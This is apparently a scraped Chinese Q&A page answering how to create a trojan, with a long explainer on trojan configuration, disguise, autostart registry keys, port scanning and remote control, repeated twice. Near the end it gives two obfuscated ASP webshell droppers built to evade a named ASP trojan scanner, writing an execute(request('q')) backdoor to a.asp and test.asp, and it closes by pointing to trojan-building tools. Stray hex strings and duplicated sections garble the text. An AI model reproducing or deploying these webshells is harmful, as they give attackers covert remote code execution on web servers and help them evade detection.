要如何在自己的电脑上创建或配置一个木马?
木马是怎样编写的?
????????二、e5a48de588b63231313335323631343130323136353331333236373133木马原理
鉴于木马的巨大危害性,我们将分原理篇,防御与反击篇,资料篇三部分来详细介绍木马,希望大家对特洛伊木马这种攻击手段有一个透彻的了解。
【一、基础知识 】
在介绍木马的原理之前有一些木马构成的基础知识我们要事先加以说明,因为下面有很多地方会提到这些内容。
一个完整的木马系统由硬件部分,软件部分和具体连接部分组成。
(1)硬件部分:建立木马连接所必须的硬件实体。 控制端:对服务端进行远程控制的一方。 服务端:被控制端远程控制的一方。 INTERNET:控制端对服务端进行远程控制,数据传输的网络载体。
(2)软件部分:实现远程控制所必须的软件程序。 控制端程序:控制端用以远程控制服务端的程序。 木马程序:潜入服务端内部,获取其操作权限的程序。 木马配置程序:设置木马程序的端口号,触发条件,木马名称等,使其在服务端藏得更隐蔽的程序。
(3)具体连接部分:通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。 控制端IP,服务端IP:即控制端,服务端的网络地址,也是木马进行数据传输的目的地。 控制端端口,木马端口:即控制端,服务端的数据入口,通过这个入口,数据可直达控制端程序或木马 程序。
用木马这种黑客工具进行网络入侵,从过程上看大致可分为六步(具体可见下图),下面我们就按这六步来详细阐述木马的攻击原理。
一.配置木马
一般来说一个设计成熟的木马都有木马配置程序,从具体的配置内容看,主要是为了实现以下两方 面功能:
(1)木马伪装:木马配置程序为了在服务端尽可能的好的隐藏木马,会采用多种伪装手段,如修改图标 ,捆绑文件,定制端口,自我销毁等,我们将在“传播木马”这一节中详细介绍。
(2)信息反馈:木马配置程序将就信息反馈的方式或地址进行设置,如设置信息反馈的邮件地址,IRC号 ,ICO号等等,具体的我们将在“信息反馈”这一节中详细介绍。
【二、传播木马】.
(1)传播方式:
木马的传播方式主要有两种:一种是通过E-MAIL,控制端将木马程序以附件的形式夹在邮件中发送出 去, 收信人只要打开附件系统就会感染木马;另一种是软件下载,一些非正规的网站以提供软件下载为名义, 将木马捆绑在软件安装程序上,下载后,只要一运行这些程序,木马就会自动安装。
(2)伪装方式:
鉴于木马的危害性,很多人对木马知识还是有一定了解的,这对木马的传播起了一定的抑制作用,这 是木马设计者所不愿见到的,因此他们开发了多种功能来伪装木马,以达到降低用户警觉,欺骗用户的目的。
(一)修改图标
当你在E-MAIL的附件中看到这个图标时,是否会认为这是个文本文件呢?但是我不得不告 诉你,这也有可能是个木马程序,现在 已经有木马可以将木马服务端程序的图标改成HTML,TXT, ZIP等各种文件的图标,这有相当大的迷 惑性,但是目前提供这种功能的木马还不多见,并且这种 伪装也不是无懈可击的,所以不必整天提心吊胆,疑神疑鬼的。
(二)捆绑文件
这种伪装手段是将木马捆绑到一个安装程序上,当安装程序运行时,木马在用户毫无察觉的 情况下 ,偷偷的进入了系统。至于被捆绑的文件一般是可执行文件(即EXE,COM一类的文件)。
(三)出错显示
有一定木马知识的人都知道,如果打开一个文件,没有任何反应,这很可能就是个木马程序, 木马的 设计者也意识到了这个缺陷,所以已经有木马提供了一个叫做出错显示的功能。当服务 端用户打开木 马程序时,会弹出一个如下图所示的错误提示框(这当然是假的),错误内容可自由 定义,大多会定制成 一些诸如“文件已破坏,无法打开的!”之类的信息,当服务端用户信以 为真时,木马却悄悄侵入了 系统。
(四)定制端口
很多老式的木马端口都是固定的,这给判断是否感染了木马带来了方便,只要查一下特定的 端口就 知道感染了什么木马,所以现在很多新式的木马都加入了定制端口的功能,控制端用户可 以在1024---65535之间任选一个端口作为木马端口(一般不选1024以下的端口),这样就给判断 所感染木马类型带 来了麻烦。
(五)自我销毁
这项功能是为了弥补木马的一个缺陷。我们知道当服务端用户打开含有木马的文件后,木马 会将自己拷贝到WINDOWS的系统文件夹中(C:WINDOWS或C:WINDOWSSYSTEM目录下),一般来说 原木马文件 和系统文件夹中的木马文件的大小是一样的(捆绑文件的木马除外),那么中了木马 的朋友只要在近来 收到的信件和下载的软件中找到原木马文件,然后根据原木马的大小去系统 文件夹找相同大小的文件, 判断一下哪个是木马就行了。而木马的自我销毁功能是指安装完木 马后,原木马文件将自动销毁,这 样服务端用户就很难找到木马的来源,在没有查杀木马的工 具帮助下,就很难删除木马了。
(六)木马更名
安装到系统文件夹中的木马的文件名一般是固定的,那么只要根据一些查杀木马的文章,按 图索骥在系统文件夹查找特定的文件,就可以断定中了什么木马。所以现在有很多木马都允许控 制端用户自由定制安装后的木马文件名,这样很难判断所感染的木马类型了。
【三.运行木马】
服务端用户运行木马或捆绑木马的程序后,木马就会自动进行安装。首先将自身拷贝到WINDOWS的 系统文件夹中(C:WINDOWS或C:WINDOWSSYSTEM目录下),然后在注册表,启动组,非启动组中设置好木马 的触发条件 ,这样木马的安装就完成了。安装后就可以启动木马了,具体过程见下文:
①由自启动激活木马
自启动木马的条件,大致出现在下面6个地方:
1.注册表:打开HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion下的五个以Run 和RunServices主键,在其中寻找可能是启动木马的键值。
2.WIN.INI:C:WINDOWS目录下有一个配置文件win.ini,用文本方式打开,在[windows]字段中有启动 命令 load=和run=,在一般情况下是空白的,如果有启动程序,可能是木马。 3.SYSTEM.INI:C:WINDOWS目录下有个配置文件system.ini,用文本方式打开,在[386Enh],[mic], [drivers32]中有命令行,在其中寻找木马的启动命令。
4.Autoexec.bat和Config.sys:在C盘根目录下的这两个文件也可以启动木马。但这种加载方式一般都 需要控制端用户与服务端建立连接后,将已添加木马启动命令的同名 文件上传 到服务端覆盖这两个文件才行。
5.*.INI:即应用程序的启动配置文件,控制端利用这些文件能启动程序的特点,将制作好的带有木马 启动命令的同名文件上传到服务端覆盖这同名文件,这样就可以达到启动木马的目的了。
6.启动菜单:在“开始---程序---启动”选项下也可能有木马的触发条件。
②由触发式激活木马
1.注册表:打开HKEY_CLASSES_ROOT文件类型\shellopencommand主键,查看其键值。举个例子,国产 木马“冰河”就是修改HKEY_CLASSES_ROOT xtfileshellopencommand下的键值,将“C :WINDOWS NOTEPAD.EXE %1”该为“C:WINDOWSSYSTEMSYXXXPLR.EXE %1”,这时你双 击一个TXT文件 后,原本应用NOTEPAD打开文件的,现在却变成启动木马程序了。还要说明 的是不光是TXT文件 ,通过修改HTML,EXE,ZIP等文件的启动命令的键值都可以启动木马 ,不同之处只在于“文件类型”这个主键的差别,TXT是txtfile,ZIP是WINZIP,大家可以 试着去找一下。
2.捆绑文件:实现这种触发条件首先要控制端和服务端已通过木马建立连接,然后控制端用户用工具 软件将木马文件和某一应用程序捆绑在一起,然后上传到服务端覆盖原文件,这样即使 木马被删 除了,只要运行捆绑了木马的应用程序,木马又会被安装上去了。
3.自动播放式:自动播放本是用于光盘的,当插入一个电影光盘到光驱时,系统会自动播放里面的内容,这就是自动播放的本意,播放什么是由光盘中的AutoRun.inf文件指定的,修改AutoRun.inf中的open一行可以指定在自动播放过程中运行的程序。后来有人用于了硬盘与U盘,在U盘或硬盘的分区,创建Autorun.inf文件,并在Open中指定木马程序,这样,当你打开硬盘分区或U盘时,就会触发木马程序的运行。
木马作者还在不断寻找“可乘之机”这里只是举例,又有不断的自启动的地方被挖掘出来。
(2)木马运行过程
木马被激活后,进入内存,并开启事先定义的木马端口,准备与控制端建立连接。这时服务端用 户可以在MS-DOS方式下,键入NETSTAT -AN查看端口状态,一般个人电脑在脱机状态下是不会有端口 开放的,如果有端口开放,你就要注意是否感染木马了。下面是电脑感染木马后,用NETSTAT命令查 看端口的两个实例:
其中①是服务端与控制端建立连接时的显示状态,②是服务端与控制端还未建立连接时的显示状态。
在上网过程中要下载软件,发送信件,网上聊天等必然打开一些端口,下面是一些常用的端口:
(1)1---1024之间的端口:这些端口叫保留端口,是专给一些对外通讯的程序用的,如FTP使用21, SMTP使用25,POP3使用110等。只有很少木马会用保留端口作为木马端口 的。
(2)1025以上的连续端口:在上网浏览网站时,浏览器会打开多个连续的端口下载文字,图片到本地 硬盘上,这些端口都是1025以上的连续端口。
(3)4000端口:这是OICQ的通讯端口。
(4)6667端口:这是IRC的通讯端口。 除上述的端口基本可以排除在外,如发现还有其它端口打开,尤其是数值比较大的端口,那就要怀疑 是否感染了木马,当然如果木马有定制端口的功能,那任何端口都有可能是木马端口。
【四.信息泄露】
一般来说,设计成熟的木马都有一个信息反馈机制。所谓信息反馈机制是指木马成功安装后会收集 一些服务端的软硬件信息,并通过E-MAIL,IRC或ICO的方式告知控制端用户。
从反馈信息中控制端可以知道服务端的一些软硬件信息,包括使用的操作系统,系统目录,硬盘分区况, 系统口令等,在这些信息中,最重要的是服务端IP,因为只有得到这个参数,控制端才能与服务端建立 连接,具体的连接方法我们会在下一节中讲解。
【五.建立连接】
这一节我们讲解一下木马连接是怎样建立的 。一个木马连接的建立首先必须满足两个条件:一是 服务端已安装了木马程序;二是控制端,服务端都要在线 。在此基础上控制端可以通过木马端口与服 务端建立连接。
假设A机为控制端,B机为服务端,对于A机来说要与B机建立连接必须知道B机的木马端口和IP地 址,由于木马端口是A机事先设定的,为已知项,所以最重要的是如何获得B机的IP地址。获得B机的IP 地址的方法主要有两种:信息反馈和IP扫描。对于前一种已在上一节中已经介绍过了,不再赘述,我们 重点来介绍IP扫描,因为B机装有木马程序,所以它的木马端口7626是处于开放状态的,所以现在A机只 要扫描IP地址段中7626端口开放的主机就行了,例如图中B机的IP地址是202.102.47.56,当A机扫描到 这个IP时发现它的7626端口是开放的,那么这个IP就会被添加到列表中,这时A机就可以通过木马的控 制端程序向B机发出连接信号,B机中的木马程序收到信号后立即作出响应,当A机收到响应的信号后, 开启一个随即端口1031与B机的木马端口7626建立连接,到这时一个木马连接才算真正建立。值得一提 的要扫描整个IP地址段显然费时费力,一般来说控制端都是先通过信息反馈获得服务端的IP地址,由于 拨号上网的IP是动态的,即用户每次上网的IP都是不同的,但是这个IP是在一定范围内变动的,如图中 B机的IP是202.102.47.56,那么B机上网IP的变动范围是在202.102.000.000---202.102.255.255,所以 每次控制端只要搜索这个IP地址段就可以找到B机了。
【六.远程控制】
木马连接建立后,控制端端口和木马端口之间将会出现一条通道。
控制端上的控制端程序可藉这条通道与服务端上的木马程序取得联系,并通过木马程序对服务端进行远 程控制。下面我们就介绍一下控制端具体能享有哪些控制权限,这远比你想象的要大。
(1)窃取密码:一切以明文的形式,*形式或缓存在CACHE中的密码都能被木马侦测到,此外很多木马还 提供有击键记录功能,它将会记录服务端每次敲击键盘的动作,所以一旦有木马入侵, 密码将很容易被窃取。
(2)文件操作:控制端可藉由远程控制对服务端上的文件进行删除,新建,修改,上传,下载,运行,更改属 性等一系列操作,基本涵盖了WINDOWS平台上所有的文件操作功能。
(3)修改注册表:控制端可任意修改服务端注册表,包括删除,新建或修改主键,子键,键值。有了这 项功能控制端就可以禁止服务端软驱,光驱的使用,锁住服务端的注册表,将服务端 上木马的触发条件设置得更隐蔽的一系列高级操作。
(4)系统操作:这项内容包括重启或关闭服务端操作系统,断开服务端网络连接,控制服务端的鼠标, 键盘,监视服务端桌面操作,查看服务端进程等,控制端甚至可以随时给服务端发送信息,想象一下,当服务端的桌面上突然跳出一段话,不吓人一跳才怪
木马和病毒都是一种人为的程序,都属于电脑病毒,为什么木马要单独提出来说内?大家都知道以前的电脑病毒的作用,其实完全就是为了搞破坏,破坏电脑里的资料数据,除了破坏之外其它无非就是有些病毒制造者为了达到某些目的而进行的威慑和敲诈勒索的作用,或为了炫耀自己的技术. "木马"不一样,木马的作用是赤裸裸的偷偷监视别人和盗窃别人密码,数据等,如盗窃管理员密码-子网密码搞破坏,或者好玩,偷窃上网密码用于它用,游戏帐号,股票帐号,甚至网上银行帐户等.达到偷窥别人隐私和得到经济利益的目的.所以木马的作用比早期的电脑病毒更加有用.更能够直接达到使用者的目的!导致许多别有用心的程序开发者大量的编写这类带有偷窃和监视别人电脑的侵入性程序,这就是目前网上大量木马泛滥成灾的原因.鉴于木马的这些巨大危害性和它与早期病毒的作用性质不一样,所以木马虽然属于病毒中的一类,但是要单独的从病毒类型中间剥离出来.独立的称之为"木马"程序.
一般来说一种杀毒软件程序,它的木马专杀程序能够查杀某某木马的话,那么它自己的普通杀毒程序也当然能够杀掉这种木马,因为在木马泛滥的今天,为木马单独设计一个专门的木马查杀工具,那是能提高该杀毒软件的产品档次的,对其声誉也大大的有益,实际上一般的普通杀毒软件里都包含了对木马的查杀功能.如果现在大家说某某杀毒软件没有木马专杀的程序,那这家杀毒软件厂商自己也好像有点过意不去,即使它的普通杀毒软件里当然的有杀除木马的功能.
还有一点就是,把查杀木马程序单独剥离出来,可以提高查杀效率,现在很多杀毒软件里的木马专杀程序只对木马进行查杀,不去检查普通病毒库里的病毒代码,也就是说当用户运行木马专杀程序的时候,程序只调用木马代码库里的数据,而不调用病毒代码库里的数据,大大提高木马查杀速度.我们知道查杀普通病毒的速度是比较慢的,因为现在有太多太多的病毒.每个文件要经过几万条木马代码的检验,然后再加上已知的差不多有近10万个病毒代码的检验,那速度岂不是很慢了.省去普通病毒代码检验,是不是就提高了效率,提高了速度内? 也就是说现在好多杀毒软件自带的木马专杀程序只查杀木马而一般不去查杀病毒,但是它自身的普通病毒查杀程序既查杀病毒又查杀木马!
鉴于木马的巨大危害性,我们将分原理篇,防御与反击篇,资料篇三部分来详细介绍木马,希望大家对特洛伊木马这种攻击手段有一个透彻的了解。
【一、基础知识 】
在介绍木马的原理之前有一些木马构成的基础知识我们要事先加以说明,因为下面有很多地方会提到这些内容。
一个完整的木马系统由硬件部分,软件部分和具体连接部分组成。
(1)硬件部分:建立木马连接所必须的硬件实体。 控制端:对服务端进行远程控制的一方。 服务端:被控制端远程控制的一方。 INTERNET:控制端对服务端进行远程控制,数据传输的网络载体。
(2)软件部分:实现远程控制所必须的软件程序。 控制端程序:控制端用以远程控制服务端的程序。 木马程序:潜入服务端内部,获取其操作权限的程序。 木马配置程序:设置木马程序的端口号,触发条件,木马名称等,使其在服务端藏得更隐蔽的程序。
(3)具体连接部分:通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。 控制端IP,服务端IP:即控制端,服务端的网络地址,也是木马进行数据传输的目的地。 控制端端口,木马端口:即控制端,服务端的数据入口,通过这个入口,数据可直达控制端程序或木马 程序。
用木马这种黑客工具进行网络入侵,从过程上看大致可分为六步(具体可见下图),下面我们就按这六步来详细阐述木马的攻击原理。
一.配置木马
一般来说一个设计成熟的木马都有木马配置程序,从具体的配置内容看,主要是为了实现以下两方 面功能:
(1)木马伪装:木马配置程序为了在服务端尽可能的好的隐藏木马,会采用多种伪装手段,如修改图标 ,捆绑文件,定制端口,自我销毁等,我们将在“传播木马”这一节中详细介绍。
(2)信息反馈:木马配置程序将就信息反馈的方式或地址进行设置,如设置信息反馈的邮件地址,IRC号 ,ICO号等等,具体的我们将在“信息反馈”这一节中详细介绍。
【二、传播木马】.
(1)传播方式:
木马的传播方式主要有两种:一种是通过E-MAIL,控制端将木马程序以附件的形式夹在邮件中发送出 去, 收信人只要打开附件系统就会感染木马;另一种是软件下载,一些非正规的网站以提供软件下载为名义, 将木马捆绑在软件安装程序上,下载后,只要一运行这些程序,木马就会自动安装。
(2)伪装方式:
鉴于木马的危害性,很多人对木马知识还是有一定了解的,这对木马的传播起了一定的抑制作用,这 是木马设计者所不愿见到的,因此他们开发了多种功能来伪装木马,以达到降低用户警觉,欺骗用户的目的。
(一)修改图标
当你在E-MAIL的附件中看到这个图标时,是否会认为这是个文本文件呢?但是我不得不告 诉你,这也有可能是个木马程序,现在 已经有木马可以将木马服务端程序的图标改成HTML,TXT, ZIP等各种文件的图标,这有相当大的迷 惑性,但是目前提供这种功能的木马还不多见,并且这种 伪装也不是无懈可击的,所以不必整天提心吊胆,疑神疑鬼的。
(二)捆绑文件
这种伪装手段是将木马捆绑到一个安装程序上,当安装程序运行时,木马在用户毫无察觉的 情况下 ,偷偷的进入了系统。至于被捆绑的文件一般是可执行文件(即EXE,COM一类的文件)。
(三)出错显示
有一定木马知识的人都知道,如果打开一个文件,没有任何反应,这很可能就是个木马程序, 木马的 设计者也意识到了这个缺陷,所以已经有木马提供了一个叫做出错显示的功能。当服务 端用户打开木 马程序时,会弹出一个如下图所示的错误提示框(这当然是假的),错误内容可自由 定义,大多会定制成 一些诸如“文件已破坏,无法打开的!”之类的信息,当服务端用户信以 为真时,木马却悄悄侵入了 系统。
(四)定制端口
很多老式的木马端口都是固定的,这给判断是否感染了木马带来了方便,只要查一下特定的 端口就 知道感染了什么木马,所以现在很多新式的木马都加入了定制端口的功能,控制端用户可 以在1024---65535之间任选一个端口作为木马端口(一般不选1024以下的端口),这样就给判断 所感染木马类型带 来了麻烦。
(五)自我销毁
这项功能是为了弥补木马的一个缺陷。我们知道当服务端用户打开含有木马的文件后,木马 会将自己拷贝到WINDOWS的系统文件夹中(C:WINDOWS或C:WINDOWSSYSTEM目录下),一般来说 原木马文件 和系统文件夹中的木马文件的大小是一样的(捆绑文件的木马除外),那么中了木马 的朋友只要在近来 收到的信件和下载的软件中找到原木马文件,然后根据原木马的大小去系统 文件夹找相同大小的文件, 判断一下哪个是木马就行了。而木马的自我销毁功能是指安装完木 马后,原木马文件将自动销毁,这 样服务端用户就很难找到木马的来源,在没有查杀木马的工 具帮助下,就很难删除木马了。
(六)木马更名
安装到系统文件夹中的木马的文件名一般是固定的,那么只要根据一些查杀木马的文章,按 图索骥在系统文件夹查找特定的文件,就可以断定中了什么木马。所以现在有很多木马都允许控 制端用户自由定制安装后的木马文件名,这样很难判断所感染的木马类型了。
【三.运行木马】
服务端用户运行木马或捆绑木马的程序后,木马就会自动进行安装。首先将自身拷贝到WINDOWS的 系统文件夹中(C:WINDOWS或C:WINDOWSSYSTEM目录下),然后在注册表,启动组,非启动组中设置好木马 的触发条件 ,这样木马的安装就完成了。安装后就可以启动木马了,具体过程见下文:
①由自启动激活木马
自启动木马的条件,大致出现在下面6个地方:
1.注册表:打开HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion下的五个以Run 和RunServices主键,在其中寻找可能是启动木马的键值。
2.WIN.INI:C:WINDOWS目录下有一个配置文件win.ini,用文本方式打开,在[windows]字段中有启动 命令 load=和run=,在一般情况下是空白的,如果有启动程序,可能是木马。 3.SYSTEM.INI:C:WINDOWS目录下有个配置文件system.ini,用文本方式打开,在[386Enh],[mic], [drivers32]中有命令行,在其中寻找木马的启动命令。
4.Autoexec.bat和Config.sys:在C盘根目录下的这两个文件也可以启动木马。但这种加载方式一般都 需要控制端用户与服务端建立连接后,将已添加木马启动命令的同名 文件上传 到服务端覆盖这两个文件才行。
5.*.INI:即应用程序的启动配置文件,控制端利用这些文件能启动程序的特点,将制作好的带有木马 启动命令的同名文件上传到服务端覆盖这同名文件,这样就可以达到启动木马的目的了。
6.启动菜单:在“开始---程序---启动”选项下也可能有木马的触发条件。
②由触发式激活木马
1.注册表:打开HKEY_CLASSES_ROOT文件类型\shellopencommand主键,查看其键值。举个例子,国产 木马“冰河”就是修改HKEY_CLASSES_ROOT xtfileshellopencommand下的键值,将“C :WINDOWS NOTEPAD.EXE %1”该为“C:WINDOWSSYSTEMSYXXXPLR.EXE %1”,这时你双 击一个TXT文件 后,原本应用NOTEPAD打开文件的,现在却变成启动木马程序了。还要说明 的是不光是TXT文件 ,通过修改HTML,EXE,ZIP等文件的启动命令的键值都可以启动木马 ,不同之处只在于“文件类型”这个主键的差别,TXT是txtfile,ZIP是WINZIP,大家可以 试着去找一下。
2.捆绑文件:实现这种触发条件首先要控制端和服务端已通过木马建立连接,然后控制端用户用工具 软件将木马文件和某一应用程序捆绑在一起,然后上传到服务端覆盖原文件,这样即使 木马被删 除了,只要运行捆绑了木马的应用程序,木马又会被安装上去了。
3.自动播放式:自动播放本是用于光盘的,当插入一个电影光盘到光驱时,系统会自动播放里面的内容,这就是自动播放的本意,播放什么是由光盘中的AutoRun.inf文件指定的,修改AutoRun.inf中的open一行可以指定在自动播放过程中运行的程序。后来有人用于了硬盘与U盘,在U盘或硬盘的分区,创建Autorun.inf文件,并在Open中指定木马程序,这样,当你打开硬盘分区或U盘时,就会触发木马程序的运行。
木马作者还在不断寻找“可乘之机”这里只是举例,又有不断的自启动的地方被挖掘出来。
(2)木马运行过程
木马被激活后,进入内存,并开启事先定义的木马端口,准备与控制端建立连接。这时服务端用 户可以在MS-DOS方式下,键入NETSTAT -AN查看端口状态,一般个人电脑在脱机状态下是不会有端口 开放的,如果有端口开放,你就要注意是否感染木马了。下面是电脑感染木马后,用NETSTAT命令查 看端口的两个实例:
其中①是服务端与控制端建立连接时的显示状态,②是服务端与控制端还未建立连接时的显示状态。
在上网过程中要下载软件,发送信件,网上聊天等必然打开一些端口,下面是一些常用的端口:
(1)1---1024之间的端口:这些端口叫保留端口,是专给一些对外通讯的程序用的,如FTP使用21, SMTP使用25,POP3使用110等。只有很少木马会用保留端口作为木马端口 的。
(2)1025以上的连续端口:在上网浏览网站时,浏览器会打开多个连续的端口下载文字,图片到本地 硬盘上,这些端口都是1025以上的连续端口。
(3)4000端口:这是OICQ的通讯端口。
(4)6667端口:这是IRC的通讯端口。 除上述的端口基本可以排除在外,如发现还有其它端口打开,尤其是数值比较大的端口,那就要怀疑 是否感染了木马,当然如果木马有定制端口的功能,那任何端口都有可能是木马端口。
【四.信息泄露】
一般来说,设计成熟的木马都有一个信息反馈机制。所谓信息反馈机制是指木马成功安装后会收集 一些服务端的软硬件信息,并通过E-MAIL,IRC或ICO的方式告知控制端用户。
从反馈信息中控制端可以知道服务端的一些软硬件信息,包括使用的操作系统,系统目录,硬盘分区况, 系统口令等,在这些信息中,最重要的是服务端IP,因为只有得到这个参数,控制端才能与服务端建立 连接,具体的连接方法我们会在下一节中讲解。
【五.建立连接】
这一节我们讲解一下木马连接是怎样建立的 。一个木马连接的建立首先必须满足两个条件:一是 服务端已安装了木马程序;二是控制端,服务端都要在线 。在此基础上控制端可以通过木马端口与服 务端建立连接。
假设A机为控制端,B机为服务端,对于A机来说要与B机建立连接必须知道B机的木马端口和IP地 址,由于木马端口是A机事先设定的,为已知项,所以最重要的是如何获得B机的IP地址。获得B机的IP 地址的方法主要有两种:信息反馈和IP扫描。对于前一种已在上一节中已经介绍过了,不再赘述,我们 重点来介绍IP扫描,因为B机装有木马程序,所以它的木马端口7626是处于开放状态的,所以现在A机只 要扫描IP地址段中7626端口开放的主机就行了,例如图中B机的IP地址是202.102.47.56,当A机扫描到 这个IP时发现它的7626端口是开放的,那么这个IP就会被添加到列表中,这时A机就可以通过木马的控 制端程序向B机发出连接信号,B机中的木马程序收到信号后立即作出响应,当A机收到响应的信号后, 开启一个随即端口1031与B机的木马端口7626建立连接,到这时一个木马连接才算真正建立。值得一提 的要扫描整个IP地址段显然费时费力,一般来说控制端都是先通过信息反馈获得服务端的IP地址,由于 拨号上网的IP是动态的,即用户每次上网的IP都是不同的,但是这个IP是在一定范围内变动的,如图中 B机的IP是202.102.47.56,那么B机上网IP的变动范围是在202.102.000.000---202.102.255.255,所以 每次控制端只要搜索这个IP地址段就可以找到B机了。
【六.远程控制】
木马连接建立后,控制端端口和木马端口之间将会出现一条通道。
控制端上的控制端程序可藉这条通道与服务端上的木马程序取得联系,并通过木马程序对服务端进行远 程控制。下面我们就介绍一下控制端具体能享有哪些控制权限,这远比你想象的要大。
(1)窃取密码:一切以明文的形式,*形式或缓存在CACHE中的密码都能被木马侦测到,此外很多木马还 提供有击键记录功能,它将会记录服务端每次敲击键盘的动作,所以一旦有木马入侵, 密码将很容易被窃取。
(2)文件操作:控制端可藉由远程控制对服务端上的文件进行删除,新建,修改,上传,下载,运行,更改属 性等一系列操作,基本涵盖了WINDOWS平台上所有的文件操作功能。
(3)修改注册表:控制端可任意修改服务端注册表,包括删除,新建或修改主键,子键,键值。有了这 项功能控制端就可以禁止服务端软驱,光驱的使用,锁住服务端的注册表,将服务端 上木马的触发条件设置得更隐蔽的一系列高级操作。
(4)系统操作:这项内容包括重启或关闭服务端操作系统,断开服务端网络连接,控制服务端的鼠标, 键盘,监视服务端桌面操作,查看服务端进程等,控制端甚至可以随时给服务端发送信息,想象一下,当服务端的桌面上突然跳出一段话,不吓人一跳才怪
木马和病毒都是一种人为的程序,都属于电脑病毒,为什么木马要单独提出来说内?大家都知道以前的电脑病毒的作用,其实完全就是为了搞破坏,破坏电脑里的资料数据,除了破坏之外其它无非就是有些病毒制造者为了达到某些目的而进行的威慑和敲诈勒索的作用,或为了炫耀自己的技术. "木马"不一样,木马的作用是赤裸裸的偷偷监视别人和盗窃别人密码,数据等,如盗窃管理员密码-子网密码搞破坏,或者好玩,偷窃上网密码用于它用,游戏帐号,股票帐号,甚至网上银行帐户等.达到偷窥别人隐私和得到经济利益的目的.所以木马的作用比早期的电脑病毒更加有用.更能够直接达到使用者的目的!导致许多别有用心的程序开发者大量的编写这类带有偷窃和监视别人电脑的侵入性程序,这就是目前网上大量木马泛滥成灾的原因.鉴于木马的这些巨大危害性和它与早期病毒的作用性质不一样,所以木马虽然属于病毒中的一类,但是要单独的从病毒类型中间剥离出来.独立的称之为"木马"程序.
一般来说一种杀毒软件程序,它的木马专杀程序能够查杀某某木马的话,那么它自己的普通杀毒程序也当然能够杀掉这种木马,因为在木马泛滥的今天,为木马单独设计一个专门的木马查杀工具,那是能提高该杀毒软件的产品档次的,对其声誉也大大的有益,实际上一般的普通杀毒软件里都包含了对木马的查杀功能.如果现在大家说某某杀毒软件没有木马专杀的程序,那这家杀毒软件厂商自己也好像有点过意不去,即使它的普通杀毒软件里当然的有杀除木马的功能.
还有一点就是,把查杀木马程序单独剥离出来,可以提高查杀效率,现在很多杀毒软件里的木马专杀程序只对木马进行查杀,不去检查普通病毒库里的病毒代码,也就是说当用户运行木马专杀程序的时候,程序只调用木马代码库里的数据,而不调用病毒代码库里的数据,大大提高木马查杀速度.我们知道查杀普通病毒的速度是比较慢的,因为现在有太多太多的病毒.每个文件要经过几万条木马代码的检验,然后再加上已知的差不多有近10万个病毒代码的检验,那速度岂不是很慢了.省去普通病毒代码检验,是不是就提高了效率,提高了速度内? 也就是说现在好多杀毒软件自带的木马专杀程序只查杀木马而一般不去查杀病毒,但是它自身的普通病毒查杀程序既查杀病毒又查杀木马!
两个非常规ASP木马e69da5e887aa3231313335323631343130323136353331333236373133程序:(本木马只提供学习用,不得用来做犯法之类,否则后果自负!)如想得到更多知识,请回帖!
为了躲避 lake2 ASP站长管理助手而写..
一.绕过lake2 Asp木马扫描的小马
〈%
set c = CreateObject("ADOX.Catalog")
c.create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("a.asp"))
set c = Nothing
c&Server.MapPath("a.asp")
set conn=server.createobject("Adodb.Connection")
conn.open connstr
conn.execute("create table nomm(nomuma oleobject)")
set rs=server.createobject("adodb.recordset")
sql="SELECT * FROM nomm"
rs.open sql,conn,1,3
rs.addnew
rs ("nomuma").appendchunk(chrB(asc("〈"))&chrB(asc("%"))&chrB(asc ("e"))&chrB(asc("x"))&chrB(asc("e"))&chrB(asc("c"))&chrB(asc ("u"))&chrB(asc("t"))&chrB(asc("e"))&chrB(asc("+"))&chrB(asc ("r"))&chrB(asc("e"))&chrB(asc("q"))&chrB(asc("u"))&chrB(asc ("e"))&chrB(asc("s"))&chrB(asc("t"))&chrB(asc("("))&chrB(34) &chrB(asc("q"))&chrB(34)&chrB(asc(")"))&chrB(asc("%"))& chrB(asc("〉")))
rs.update
rs.close
set rs=nothing
conn.close
set conn=nothing
%〉
二.xls版asp webshell
〈%
Set xlA = Server.CreateObject("Excel.Application")
xlA.Visible = False
xlA.Workbooks.Add
Set xlWorksheet = xlA.Worksheets(1)
xlWorksheet.Cells(1,1).Value = "〈%ex"&"ec"&"ute(request(""q""))"+chr(37)+"〉"
’strFile = "d:/test.asp"
strFile = Server.MapPath("test.asp")
xlWorkSheet.SaveAs strFile
xlA.Quit
Set xlWorksheet = Nothing
Set xlA = Nothing
%〉
(至于原理,自己研究)
为了躲避 lake2 ASP站长管理助手而写..
一.绕过lake2 Asp木马扫描的小马
〈%
set c = CreateObject("ADOX.Catalog")
c.create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("a.asp"))
set c = Nothing
c&Server.MapPath("a.asp")
set conn=server.createobject("Adodb.Connection")
conn.open connstr
conn.execute("create table nomm(nomuma oleobject)")
set rs=server.createobject("adodb.recordset")
sql="SELECT * FROM nomm"
rs.open sql,conn,1,3
rs.addnew
rs ("nomuma").appendchunk(chrB(asc("〈"))&chrB(asc("%"))&chrB(asc ("e"))&chrB(asc("x"))&chrB(asc("e"))&chrB(asc("c"))&chrB(asc ("u"))&chrB(asc("t"))&chrB(asc("e"))&chrB(asc("+"))&chrB(asc ("r"))&chrB(asc("e"))&chrB(asc("q"))&chrB(asc("u"))&chrB(asc ("e"))&chrB(asc("s"))&chrB(asc("t"))&chrB(asc("("))&chrB(34) &chrB(asc("q"))&chrB(34)&chrB(asc(")"))&chrB(asc("%"))& chrB(asc("〉")))
rs.update
rs.close
set rs=nothing
conn.close
set conn=nothing
%〉
二.xls版asp webshell
〈%
Set xlA = Server.CreateObject("Excel.Application")
xlA.Visible = False
xlA.Workbooks.Add
Set xlWorksheet = xlA.Worksheets(1)
xlWorksheet.Cells(1,1).Value = "〈%ex"&"ec"&"ute(request(""q""))"+chr(37)+"〉"
’strFile = "d:/test.asp"
strFile = Server.MapPath("test.asp")
xlWorkSheet.SaveAs strFile
xlA.Quit
Set xlWorksheet = Nothing
Set xlA = Nothing
%〉
(至于原理,自己研究)
有软件 直接生成的木马 比如灰鸽子 还有各种远控软件
直接搜索木马生成软件就可以了
怎样写木马配置程序
